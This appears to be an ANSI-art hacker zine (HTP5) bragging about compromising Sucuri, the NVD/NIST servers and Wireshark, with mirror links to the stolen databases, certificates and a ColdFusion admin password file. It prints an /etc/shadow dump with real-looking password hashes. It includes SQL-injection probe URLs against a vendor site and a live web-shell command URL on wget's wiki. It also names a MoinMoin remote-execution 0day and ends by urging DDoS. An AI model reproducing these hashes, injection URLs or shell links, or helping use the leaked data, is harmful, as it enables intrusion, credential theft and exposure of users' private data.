Sucuri, why didn't you announce that you got owned? Pretty useless warning      
system, if you ask us.                                                          
                                                                                
[root@sucuri www]# uname -a                                                     
Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
 i386 GNU/Linux                                                                 
                                                                                
2001, here we come                                                              
[root@sucuri www]# cat /etc/shadow                                              
root:iFvywDsrRwmjI:15755:0:99999:7:::                                           
bin:*:14746:0:99999:7:::                                                        
daemon:*:14746:0:99999:7:::                                                     
adm:*:14746:0:99999:7:::                                                        
lp:*:14746:0:99999:7:::                                                         
sync:*:14746:0:99999:7:::                                                       
shutdown:*:14746:0:99999:7:::                                                   
halt:*:14746:0:99999:7:::                                                       
mail:*:14746:0:99999:7:::                                                       
news:*:14746:0:99999:7:::                                                       
uucp:*:14746:0:99999:7:::                                                       
operator:*:14746:0:99999:7:::                                                   
games:*:14746:0:99999:7:::                                                      
gopher:*:14746:0:99999:7:::                                                     
ftp:*:14746:0:99999:7:::                                                        
nobody:*:14746:0:99999:7:::                                                     
vcsa:!!:14746:0:99999:7:::                                                      
ntp:!!:14746::::::                                                              
sshd:!!:14746::::::                                                             
dre:mAuUxgVOcOeAE:15678:0:99999:7:::                                            
apache:!!:14898::::::                                                           
mysql:!!:14898::::::                                                            
mailnull:!!:14946::::::                                                         
smmsp:!!:14946::::::                                                            
ossec:!!:15461:0:99999:7:::                                                     
^ OSSEC? Here, We're sure you'll get a kick out of this:                        
                                                                                
TrendMicro (owns OSSEC) DB access via SQLi:                                     
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5      
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4      
                                                                                
Included in this segment of HTP5 are the databases of Sucuri's primary site,    
though labs.sucuri.net and the rest of their VPS's were also compromised.       
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz                         
|- 2.1MB | Sucuri WP DB's                                                       
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"GREGORY D. EVANS, BABY! NUMBA 1!"                                              
                                                                                
                              ░░░▒▒▒▒░░░░░░░                                    
                        ░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░                               
                     ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░                           
                   ░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░                         
                ░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒                       
               ▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░                     
              ▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒                    
             ▒▒▒▒▒▒▒▒░░░░░       ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒                   
            ▒▒▒▒▒▒▒░░░░░░          ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒                  
           ░▒▒▒▒▒▒░░░░░░░          ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒                 
           ▒▒▒▒▒▒▒░░░░░░░         ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░                
           ▒▒▒▒▒▒▒▒░░░░░░░░      ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒                
          ░▒▒▒▒▒▒▒▒░░░░░░░░░      ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░               
           ▒▒▒▒▒▒▒░░░░░░   ░░    ░░░  ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░               
           ▒▒▒▒▒▒▒░░░░░░   ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░               
           ░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒              
           ░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒             
            ▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░            
            ▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░  ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░            
            ▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░            
            ▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░            
             ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░     ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░            
             ▒▒▒▒▒▒▒░░░░▒▒░░░   ░░░░░▒▒▒▒░░     ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒             
             ▒▒▒░░░░░░░░▒░░░░   ░░ ░░▒▒▓▒▒▒▒░░  ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒             
              ▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓             
              ▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒            
              ▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒         
               ▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒      
                ▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒   
                 ▓▓▓▓▓▓▓▓▓▓▓▓▓▒░       ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
                  ▓▓▓▓▓▓▓▓▒▓▓▒▒░     ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓  ▒██████████████
                   ▓▓▓▓▒▒▒▒▒▒▒░░░     ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒   ▓██████████████
                    ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░   ░▓██████████████
                      ▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░     ▓▓██████████████
                        ▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░      ▒▓███████████████
                      ▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░       ░▓▓███████████████
                  ▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒         ░▓▓████████████████
               ▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░           ▓▓█████████████████
           ▓▓▓███████████████▓  ░▒▓▓▓██████▓▓▓▒             ▓▓██████████████████
       ▓▓▓████████████████████▒     ░▒▓▓▓██▓▒              ▓▓███████████████████
    ▓▓▓███████████████████████▓░        ░▓▒               ▒▓▓███████████████████
▓▓▓▓███████████████████████████▒        ▓▓▓              ▒▓█████████████████████
▓██████████████████████████████▓░      ▓▓▓▓▒            ░▓▓█████████████████████
███████████████████████████████▓░     ▓▓▓▓▓░▓░          ▓▓▓█████████████████████
███████████████████████████████▓     ░▓▓▒▒▓▒▓▓▒        ▓▓▓██████████████████████
███████████████████████████████░     ▒▓▒▒░▓▓▓░        ▒▓▓███████████████████████
███████████████████████████████▒     ▓▓▒░░▓▓░        ░▓▓████████████████████████
███████████████████████████████▒    ░▒▒▒▓▓▓▓▒       ░▓▓█████████████████████████
██████████████████████████████▓▓    ░▒▓▒▓▓▓▒▒▒      ▓▓██████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀


   ▄▄    ▄▄  ▄  ▄▄▄▄  ▄▄▄▄▄       ▄▄    ▄▄  ▄   ▄  ▄▄▄                          
   ███▄  ██  █  █▄▄▄    █    ▄▄▄  ███▄  ██  █   █  █  █                     HTP5
   ██ ▀█▄██  █  ▄▄▄█    █         ██ ▀█▄██   ▀▄▀   █▄▄▀                         
   ██   ▀██                       ██   ▀██                                      
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                    GILL                                                        
       However, we have come to believe that one 'HTP'                          
       is involved in the NVD breach. They or perhaps                           
       an accomplice of theirs have a disk that Mr.                             
       Belford needs. We want you to help us find it.                           
                                                                                
                        \                                                       
                                                                                
                              ░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░                                 
                          ░▒▓███████████████████▓▒░                             
                       ░▒▓█████████████████████████▓▒░                          
                     ░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓                         
                    ░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓                        
                   ░▓████▓▓▓▒▒▒▒▒▒▒░░░░     ░░░░░▒▒▓▓▓██▓                       
                   ▓████▓▓▒▒▒▒▒▒░░░░           ░░▒▒▒▓▓▓██▒                      
                  ▒████▓▓▓▒▒▒▒▒░░░               ░▒▒▒▓▓▓██                      
                  ▓████▓▓▒▒▒▒▒▒░░░               ░░▒▒▒▓▓▓█░                     
                  █████▓▓▒▒▒▒▒░░░                 ░░▒▒▒▓▓█▒                     
                  ████▓▓▒▒▒▒▒▒▒▒▒░░              ░░▒▒▒▒▓▓▓▓                     
                  ███▓▓▒▒▒▒▒▒▒░░░               ░░░░▒▒▒▓▓▓▓                     
                  ▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░   ░▄▓▓▓▓▓▓▓▓▓█▓▓▓                     
                  ▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░                    
                  ▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓                     
                 ░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░                    
                 ▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░   ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒                    
                 ░▒▒▒▒▒▒▒▒▒░░         ░░░     ░░▒    ░░▒▒▒▓                     
                 ▒▒▒▒▒▒▒▒▒▒▒░         ░░░░░   ░░░░░    ░░▒▓▒                    
                  ░▒▒▒▒▒▒▒▒▒░         ░░░░░  ░▒░░░     ░▒▒▓                     
                  ░▒▒▒▒▒▒▒▒░░░░  ░░░░▒▒▒▒░░░░░▓▓▒░░  ░░░▒▓▓                     
                  ░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░                    
                  ░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░       ░░▒▓▓▓▓▒▒▒▓▒▓░                    
                   ▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░  ░░░░░▒▒▓▓▒▒▒▒▒▓                     
                    ▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒                     
                    ▓▓▓▓▓▒▒▒▒▒▒▒▓▒   ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓                      
                    ▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░   ░░░░░░░▒▒▒▒▓▓▒▓▓▒                      
                   ░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░        ░░▒▒▓▓▓▓▓▓▓                       
                   ░  ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░     ░░▒▒▒▒▓▓▓▓▒▓                       
                  ░▒   ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░    ░▒▒▒▓▓▒▓█▓▒ ░░                      
                 ░██░    ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒  ░                      
                ▒████░      ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒   ▓▒░                   
              ▒▓██████▒        ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒   ▓███▓▓▒▒░░            
          ░▒▓██████████▓          ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒   ░██████████▓▓▓▒▒░░    
      ░▒▓███████████████▓             ░░░░▒▒▒▒▒▒▒▒░░▒░     ▒█████████████████▓▓▒
 ░▒▓▓████████████████████▓░              ▓▓▓▓░▓▓▓░░░        ████████████████████
██████████████████████████▓░              ▓▓▓▓▓▓░           ▒███████████████████
████████████████████████████▒               ▓▓██             ▓██████████████████
█████████████████████████████▒               ████            ░██████████████████
██████████████████████████████▒              ▀████            ▒█████████████████
███████████████████████████████▓              █████            █████████████████
████████████████████████████████▓             ██████           ▒████████████████
█████████████████████████████████▓            ███████           ▓███████████████
██████████████████████████████████▓░          ████████          ░▓██████████████
████████████████████████████████████░         ▓████████          ▒██████████████
█████████████████████████████████████░        █████████           ██████████████
██████████████████████████████████████▒        █████████          ▓█████████████
███████████████████████████████████████▒       ██████████         ░█████████████
████████████████████████████████████████▓      ▒██████████         ▓████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
                                                                                
About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
networks) and came across an individual who was pretty skilled with ColdFusion. 
After due time, we invited him/her to HTP. He/she ended up manifesting the NULL 
RDS 1day POC, which owned the NVD.                                              
                                                                                
The NVD realized they were breached, and deleted the shells. Soon after, they   
were shelled again. They deleted the shells again. Once again, they were        
shelled. The DHS CSD was swift and unrelenting with their execution of the      
DELETE key.                                                                     
                                                                                
As fun as this was, the rest of HTP acknowledged what had been breached. We     
switched tactics and proceeded to traverse the National Vulnerability Database  
network. Two boxes down, we downloaded the CFM scripts and certificates hosted  
within the NVD and NISTWEB servers. From them, we were able to authenticate     
ourselves to access the DHS NIST/NVD user database (root slash period workspace 
slash period garbage period).                                                   
                                                                                
Not knowing what to do, and realizing their DELETE key training had abandoned   
them, the DHS CSD resorted to shutting the entire site down. It is our theory   
their inspiration for this technique came from an NCIS episode:                 
http://www.youtube.com/watch?v=u8qgehH3kEQ                                      
                                                                                
Included in this segment of HTP5 is the DHS NIST/NVD user database, along with  
two certificates and their ColdFusion admin password.properties. Enjoy.         
                                                                                
                                                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip                            
|- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties    
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄


███    ███        ▄████  ▄▄████▄▄  ███    ███  
███    ███       ▄█████ ▄██▀  ▀██▄ ███   ███   
███    ███      ▄██▀███ ███    ███ ███  ███    
██████████     ▄██▀ ███ ███        ███▄███                        W
███    ███    ▄██▀  ███ ███        ████████                       I
███    ███   ▄██▀   ███ ███    ███ ███  ████                      R
███    ███  ▄██████████ ▀██▄  ▄██▀ ███   ████                     E
███    ███ ▄██▀     ███  ▀▀████▀▀  ███    ████                    S
                                                                  H
                                                                  A
                                         _____                    R
███████████ ███    ███ ██████████     ,-:` \;',`'-                K
    ███     ███    ███ ███          .'-;_,;  ':-;_,'.             
    ███     ███    ███ ███         /;   '/    ,  _`.-\  
    ███     ██████████ ███████    | '`. (`     /` ` \`|       
    ███     ███    ███ ███        |:.  `\`-.   \_   / |      
    ███     ███    ███ ███        |     (   `,  .`\ ;'|     
    ███     ███    ███ ███         \     | .'     `-'/    
    ███     ███    ███ ██████████   `.   ;/        .'
                                      `'-._____.-'`   
                                      
                                      
███████▄▄  ███             ▄████ ███▄    ███ ██████████ ███████████  /""-._
███   ▀██▄ ███            ▄█████ ████▄   ███ ███            ███     .      '-,
███    ███ ███           ▄██▀███ █████▄  ███ ███            ███     :         '',
███   ▄██▀ ███          ▄██▀ ███ ███▀██▄ ███ ███████        ███     ;      *     '.
███████▀▀  ███         ▄██▀  ███ ███ ▀██▄███ ███            ███     ' *         () '.
███        ███        ▄██▀   ███ ███  ▀█████ ███            ███      \               \
███        ███       ▄██████████ ███   ▀████ ███            ███       \      _.---.._ '.
███        ████████ ▄██▀     ███ ███    ▀███ ██████████     ███        :  .' _.--''-''  \ ,'
                                                         .._            '/.'             . ;
                                                          ; `-.          ,                \'
                                                           ;   `,         ;              ._\
                                                            ;    \     _,-'                ''--._
                                                             :    \_,-'                          '-._
                                                              \ ,-'                       .          '-._
                                                             .'         __.-'';            \...,__       '.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   0x06   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.'      _,-'       \              \   ''--.,__ '\
                                                           /   _,--' ;          \             ;           "^.}
For the final segment of HTP5, we present: Wireshark.     ;_,-' )     \  )\      )            ;
                                                               /       \/  \_.,-'             ;
Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget      /                              ;
were all compromised by moinmelt.py, our RXE 0day for      ,-'  _,-'''-.    ,-.,            ;       
MoinMoin (included in HTP5). Hell, Wget is still        ,-' _.-'        \  /    |/'-._...--'
shelled. Would someone please update them? It's been   :--``             )/
months by now:                                                    
                                                                  
http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a   
                                                                  
We had our sights set on backdooring Mercurial, which             
would land us shells on UnrealIRCd (3rd time!), Firefox,          
QuakeNet, Pidgin, and Debian repositories. However, we            
were more interested in having fun, so instead we dropped         
into Wireshark's server.                                          
                                                                  
After 24 hours, Wireshark's server 'splash' returned a shell.     
It featured a 3.7 kernel and an Apache httpd, which hosted        
both the blog and the wiki. Permissions were read-world on        
the config files, and we couldn't help ourselves. We then         
proceeded to monitor Wireshark's www-data mail, as well as        
download their user databases. All of the above is included       
in the concluding segment of HTP5. Enjoy your corporate           
security access.                                                  
                                                                  
                                                                  
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip  
|- 1.3MB | 31MB compressed Wireshark data                         
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄


▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  ▄▄▄▄▄                                                                         
  █   █  ▄  ▄  ▄▄▄▄▄  ▄▄▄▄  ▄▄▄▄                                            HTP5
  █   █  █  █    █    █▄▄█  █  █                                                
  █▄▄▄█  █▄▄█    █    █ ▀▄  █▄▄█                                                
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                                                                                
                                                                                
We've come a long way since we first showed up on the Scene. Current and past   
crew of Hack The Planet, we appreciate your kickass effort that got us to this  
point. Since our inception, we have unfortunately witnessed a few of our crew   
members getting arrested. To them, we regret what has transpired, and wish you  
all the best beyond HTP.                                                        
                                                                                
This zine, like all of the others, has been a blast to create. Those interested 
can check out http://straylig.ht/ for past releases.                            
                                                                                
Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,   
and DDoS Anonymous on sight.                                                    
                                                                                
Hack the Planet!                                                                
                                                                                
                                                                                
Shout Outs To:                                                                  
> ACiD (colored ANSI)                                                           
                                                                                
                                                                                
                                                                                
                   .                                                            
                                          .                                     
                          H      .                                              
                    ░▓▓▓▓▓▓▓▓▓▓▓        .           P                           
                    ▒▓█▀▀▀██████░      T       ░▓▓▓▓▓▓▓▓▓▓                      
                    ▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓  ▒▓█▀▀▀█████░                     
                    ▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░                     
                    ▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░                     
                    ▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░                     
                    ▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░                     
                    ▒▓███▀▀▀████░▒▓███  ▀ ███░ ▒▓██ ▀ ████░                     
                   |▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓                    
                    ▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░                   
                   |▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░                   
            \      |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░                   
             \      ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░                   
                ,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██  ▀ ██░                   
              ,`    ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░                  
        ▒░   /     ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒   ▒       ▒▒▓   
  ▒▒   ▒▒░   ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒  ░▒   ▒▒▓   
▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒  ░▒▒  ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF